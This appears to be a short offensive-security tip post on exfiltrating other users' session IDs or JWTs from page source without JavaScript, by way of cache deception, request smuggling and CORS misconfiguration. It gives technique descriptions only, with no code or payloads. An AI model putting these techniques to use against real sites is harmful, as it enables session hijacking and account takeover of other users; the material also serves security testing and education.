0x06 - JWT Exfil from Source Page

Did you know you can exfiltrate the session ID/JWT of other users from the source of the page even without JavaScript?

Often we find sensitive info stored insecurely in the app's source page but we tend to overlook it because we can't run Javascript to extract this information

But there are several other attacks that you can weaponize to extract this information


How to do it

  1. Cache Deception - the attacker causes the application to store some sensitive content belonging to another user in the cache, and the attacker then retrieves this content from the cache.

  2. Request Smuggling - the attacker abuses the way a web site processes multiple sequences of HTTP requests and returns HTTP response that may belong to other users. If we get the source page of a user that is authenticated, chances are the his session ID/JWT token are disclosed

  3. CORS Misconfiguration - a combination of reflected Origin and Access-Control-Allow-Credentials: true means that any domain can access resources from the vulnerable domain. If the response contains any sensitive information such as the session token/JWT, you can retrieve it and reuse it


References